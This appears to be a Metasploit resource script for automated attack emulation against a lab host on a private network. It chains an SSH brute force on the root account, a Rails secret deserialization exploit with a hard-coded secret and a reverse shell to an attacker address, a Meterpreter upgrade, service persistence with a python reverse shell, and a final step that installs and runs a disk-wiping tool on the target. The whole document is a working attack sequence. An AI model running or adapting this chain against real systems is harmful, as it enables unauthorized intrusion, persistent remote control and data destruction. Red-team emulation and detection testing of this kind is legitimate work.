# ============================================================
# STEP 1 - SSH Brute Force
# ============================================================

sleep 15

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.181
set RPORT 22
set USERNAME root
set PASS_FILE /home/ahnafrr/Desktop/attackmate/unix_passwords_modified.txt
run

sleep 15

# ============================================================
# STEP 2 - Rails Secret Deserialization 
# ============================================================

use exploit/multi/http/rails_secret_deserialization
set payload ruby/shell_reverse_tcp
set LHOST 192.168.56.191
set LPORT 4444
set RHOSTS 192.168.56.181
set RPORT 8181
set TARGETURI /
set SECRET a7aebc287bba0ee4e64f947415a94e5f
run

# ============================================================
# STEP 3 - Upgrade Shell to Meterpreter
# ============================================================

use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

sleep 15

# ============================================================
# STEP 4 - Service Persistence
# ============================================================

use exploit/linux/local/service_persistence
set payload cmd/unix/reverse_python
set SESSION 2
set VERBOSE True
set LHOST 192.168.56.191
run

sessions -k 1, 2, 3

sleep 15

# ============================================================
# STEP 5 - Multi Handler    
# ============================================================

use exploit/multi/handler
set payload cmd/unix/reverse_python
set SESSION 3
set VERBOSE True
set LHOST 192.168.56.191
run

# ============================================================
# STEP 6 - Disk Wipe
# ============================================================

sessions -c 'apt install wipe -y' -i 3
sleep 15
sessions -c "wipe -f {0}/tmp" -i 3
